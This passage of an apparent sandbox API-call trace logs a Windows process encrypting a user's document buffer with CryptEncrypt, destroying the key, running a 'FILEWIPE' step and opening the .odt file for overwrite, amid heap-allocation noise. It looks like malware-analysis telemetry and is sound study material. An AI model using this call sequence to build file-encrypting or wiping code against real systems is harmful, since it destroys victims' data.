lpMsg=0x87e7d4) returned 0 [0179.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.066] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x6a9d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x6aa0) returned 1 [0179.066] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.066] CharLowerBuffW (in: lpsz="byte[27297]", cchLength=0xb | out: lpsz="byte[27297]") returned 0xb [0179.067] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.069] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbfe010*, pdwDataLen=0x87e820*=0x6a9d, dwBufLen=0x6aa0 | out: pbData=0xbfe010*, pdwDataLen=0x87e820*=0x6aa0) returned 1 [0179.070] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.079] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0179.079] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.079] CryptDestroyKey (hKey=0x90aed8) returned 1 [0179.080] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.080] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.080] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.080] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0179.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.080] FreeLibrary (hLibModule=0x74f20000) returned 1 [0179.085] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0179.085] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x4fe3fc70, ftLastWriteTime.dwHighDateTime=0x1d5e5cf, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hiVdX.odt", cAlternateFileName="")) returned 0x90ae18 [0179.085] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.086] CharLowerBuffW (in: lpsz="byte[27293]", cchLength=0xb | out: lpsz="byte[27293]") returned 0xb [0179.086] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0179.086] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0179.086] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2688 [0179.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.087] FreeLibrary (hLibModule=0x75c90000) returned 1 [0179.087] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0179.087] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.088] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0179.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0179.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd930, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0179.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\hivdx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd0ab0 | out: hHeap=0x8a0000) returned 1 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.090] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0179.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0179.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: 